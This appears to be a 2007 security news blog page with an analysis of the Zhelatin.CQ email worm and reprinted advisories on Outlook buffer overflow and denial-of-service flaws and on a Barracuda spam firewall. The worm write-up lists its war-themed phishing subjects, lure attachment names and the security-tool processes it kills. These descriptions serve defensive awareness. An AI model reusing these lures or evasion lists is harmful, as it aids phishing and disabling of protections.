Information Security News

Monday, April 9, 2007

Email-Worm:W32/Zhelatin.CQ

Name : Email-Worm:W32/Zhelatin.CQ
Alias: Email-Worm.Win32.Zhelatin.cq
Type: E-Mail Worm, Rootkit
Category: Malware
Platform: Microsoft Windows Win32
Date of Discovery: April 08, 2007
Radar Alert Level 2

Summary
The Zhelatin.CQ worm started to spread very late on April 8th, 2007. The worm spreads in e-mails with war-related subjects as an attachment named 'video.exe', 'movie.exe', 'click me.exe' and so on. The worm creates its own peer-to-peer network.

Detailed Description
After the worm's file is started by a user, it drops a randomly named file into the same folder where it was started from and runs it. This file installs a rootkit and p2p (peer-to-peer) component into the Windows System folder. The file name is wincom32.sys. The following startup key is created in the Registry for the dropped file:

[HKLM\System\ControlSet001\Services\wincom32]
@ = "%WinSysDir%\wincom32.sys"

The installed component has rootkit features: it hides its Registry keys and active process so that an anti-rootkit engine is needed to reveal them. In addition this component drops a text file named wincom32.ini into the Windows System folder. This file contains a list of clients for the worm's peer-to-peer network. The peer names and access ports are encoded. Here's an example of the file's contents:

[counter]
Counter=0
[peers]
003964D3640550573F800125725481EF=5326859A123900
004982069E5DB75721B54CFF33A26170=5955FC93123900
00A1836AE91D076BC265F9735204714F=451AAE831EBF00

The dropped file also has a blacklist area, but it's empty at the moment. The worm decodes the clients' addresses and access ports and connects itself to the peer-to-peer network. A significant number of UDP connections can be observed when the worm is trying to connect to its p2p network.

At the same time the worm's copy that stays in memory, starts its spreading cycle. It creates a mutex named klllekkdkkd and scans files on local hard disks for victims' e-mail addresses. The worm ignores e-mail addresses if they contain any of the following substrings:

microsoft
.gov
.mil

Then the worm starts to spread in e-mails. It sends messages with the following subjects to all found e-mail addresses:

USA Declares War on Iran
USA Missle Strike: Iran War just have started
Missle Strike: The USA kills more then 20000 Iranian citizens
Missle Strike: The USA kills more then 1000 Iranian citizens
Missle Strike: The USA kills more then 10000 Iranian citizens
Israel Just Have Started World War III
USA Just Have Started World War III
Iran Just Have Started World War III

As you see, the subjects are war-related, so it's a good social engineering trick. The worm always attaches itself to the e-mails that it sends out. The attachment names can be any of the following:

More.exe
Read More.exe
Click Here.exe
Click Me.exe
Read Me.exe
Movie.exe
News.exe
Video.exe

When a recipient of such e-mail opens the attachment, his/her computer becomes infected and the worm continues its spreading cycle.

The worm has a payload. It kills processes if they have the following substrings in their names:

mcafee
taskmgr
hijack
f-pro
lockdown
msconfig
firewall
blackice
avg
vsmon
zonea
spybot
nod32
reged
rav
nav
avp
troja
viru
anti

Labels: Email, Microsoft, Worm

Tuesday, March 6, 2007

Microsoft Outlook Advanced Find - Remote Code Execution Microsoft Outlook Advanced Find - Remote Code Execution

Security Advisory : CT09-01-2007

Microsoft Outlook Advanced Find - Remote Code Execution
Severity: Critical
Impact: Remote System Access
Solution Status: Vendor Patch
CVE Reference: CVE-2007-0034
Advisory Date: 11th January 2007

Affected Software: Microsoft Outlook 2000
Microsoft Outlook 2002
Microsoft Outlook 2003

1. OVERVIEW

Microsoft Outlook is a popular personal communication manager that
provides end users with a unified place to manage e-mail, calendar
and contact information.

As part of its standard offering, Outlook also includes an Advanced
Search facility (Finder.exe) enabling end-users to query any aspect
of their repository information.

Unfortunately, it transpires that Outlook/Finder is susceptible to
a remote Buffer overflow vulnerability, when processing the contents
of a specially crafted Office Saved Search (.oss) file.

2. TECHNICAL NARRATIVE

The issue in question stems from a simple oversight in the design of
an intrinsic string manipulation function, which attempts to copy
1024 bytes of user supplied Unicode content, to a pre-allocated buffer
of only 512 bytes (even though sufficient length checks are invoked).

As the destination buffer is unable to accommodate the additional data,
the net result is that of a classic stack overflow condition, in which
Instruction Pointer (EIP) control is gained via one of several available
return addresses.

3. EXPLOITATION

As with most file parsing vulnerabilities, the aforementioned issue
will require a certain degree of social engineering to achieve successful
exploitation.

However, Office Saved Searches (.oss) file types share very similar
display characteristics to that of harmless looking e-mail icons.
As such, end-users could be fooled into thinking the attachment is
a non-threatening mail forward.

4. VENDOR RESPONSE

The vendor security bulletin and corresponding patches are available at the
following location:

http://www.microsoft.com/technet/security/Bulletin/MS07-003.mspx

5. DISCLOSURE ANALYSIS

12/05/2006 - Preliminary Vendor notification.
24/05/2006 - Vulnerability confirmed by Vendor
16/10/2006 - Public Disclosure Deferred by Vendor
09/01/2007 - Public release.

Total Time to Fix: 7 months 29 Days (243 days in total)

6. CREDIT

The vulnerability was discovered by Stuart Pearson

Computer Terrorism (UK) :: Incident Response Centre.

Labels: Bug, Email, Microsoft, Vulnerability

Microsoft Outlook Malformed Email Header Remote Denial of Service Vulnerability

Microsoft Outlook Malformed Email Header Remote Denial of Service Vulnerability
Bugtraq ID: 21937
Class: Failure to Handle Exceptional Conditions
CVE: CVE-2006-1305
Remote: Yes
Local: No
Published: Jan 09 2007 12:00AM
Updated: Jan 25 2007 04:26PM
Credit: The vendor disclosed this issue.

Microsoft Outlook is prone to a remote denial-of-service vulnerability because the application fails to properly handle malformed email messages.

A remote attacker can exploit this issue to crash affected email clients. This issue will persist as long as the email message resides on the mail server, creating a prolonged denial-of-service condition.

see http://www.microsoft.com/technet/security/Bulletin/MS07-003.mspx

Vulnerable: Microsoft Outlook 2003 SP2
+ Microsoft Office 2003 SP3
+ Microsoft Office 2003 SP2
+ Microsoft Office 2003 SP1
+ Microsoft Office 2003
Microsoft Outlook 2003 0
+ Microsoft Office 2003 SP3
+ Microsoft Office 2003 SP2
+ Microsoft Office 2003 SP1
+ Microsoft Office 2003
Microsoft Outlook 2002 SP3
+ Microsoft Office XP SP3
+ Microsoft Office XP SP3
Microsoft Outlook 2002 SP2
+ Microsoft Office XP SP2
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Terminal Services SP3
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
Microsoft Outlook 2002 SP1
+ Microsoft Office XP SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
- Microsoft Windows XP Professional
Microsoft Outlook 2002 0
+ Microsoft Office XP
+ Microsoft Office XP
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
- Microsoft Windows XP Professional
Microsoft Outlook 2000 SP3
+ Microsoft Office 2000 SP3
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Home
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
- Microsoft Windows XP Professional
Microsoft Outlook 2000 0
- Citrix ICA Client for Windows 4.0 SP6a
+ Microsoft Office 2000
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
Microsoft Outlook 2000 SR1
- Citrix ICA Client for Windows 4.0 SP6a
+ Microsoft Office 2000 SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
Microsoft Outlook 2000 SP2
- Citrix ICA Client for Windows 4.0 SP6a
+ Microsoft Internet Explorer for Unix SP2
+ Microsoft Internet Explorer for Unix SP2
+ Microsoft Office 2000 SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
Microsoft Office XP SP3
+ Microsoft Excel 2002 SP3
+ Microsoft Excel 2002 SP3
+ Microsoft FrontPage 2002 SP3
+ Microsoft FrontPage 2002 SP3
+ Microsoft Outlook 2002 SP3
+ Microsoft Outlook 2002 SP3
+ Microsoft PowerPoint 2002 SP3
+ Microsoft PowerPoint 2002 SP3
+ Microsoft Publisher 2002 SP3
+ Microsoft Publisher 2002 SP3
+ Microsoft Word 2002 SP3
+ Microsoft Word 2002 SP3
Microsoft Office XP SP2
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
Microsoft Office XP SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Office XP
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Office 2003 SP2
Microsoft Office 2003 SP1
Microsoft Office 2003
+ Microsoft Excel 2003
+ Microsoft FrontPage 2003
+ Microsoft InfoPath 2003
+ Microsoft OneNote 2003 0
+ Microsoft Outlook 2003 0
+ Microsoft PowerPoint 2003 0
+ Microsoft Publisher 2003
+ Microsoft Word 2003
Microsoft Office 2000 SP3
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
Microsoft Office 2000 SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Office 2000
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Internet Explorer for Unix SP2

Not Vulnerable:
(Nothing!)

Labels: Advisory, Email, Microsoft, Vulnerability

Monday, February 26, 2007

Barracuda Networks Spam Firewall Multiple Vulnerabilities

Barracuda Networks Spam Firewall Multiple Vulnerabilities
Bugtraq ID: 19276
Class: Unknown
Remote: Yes
Local: No
Published: Aug 01 2006 12:00AM
Updated: Aug 08 2006 10:46PM
Credit: Greg Sinclair has been credited with the discovery of these vulnerabilities.
Vulnerable: Barracuda Networks Barracuda Spam Firewall 3.3.03.055
Barracuda Networks Barracuda Spam Firewall 3.3.03.053
Barracuda Networks Barracuda Spam Firewall 3.3.01.001

Spam Firewall is prone to multiple vulnerabilities, including a directory-traversal issue, access-validation issue, and a remote command-execution issue.

A remote attacker can exploit these issues to gain access to potentially sensitive information and execute commands in the context of the affected application.

-------

Matthew Hall (lists ecsc co uk)
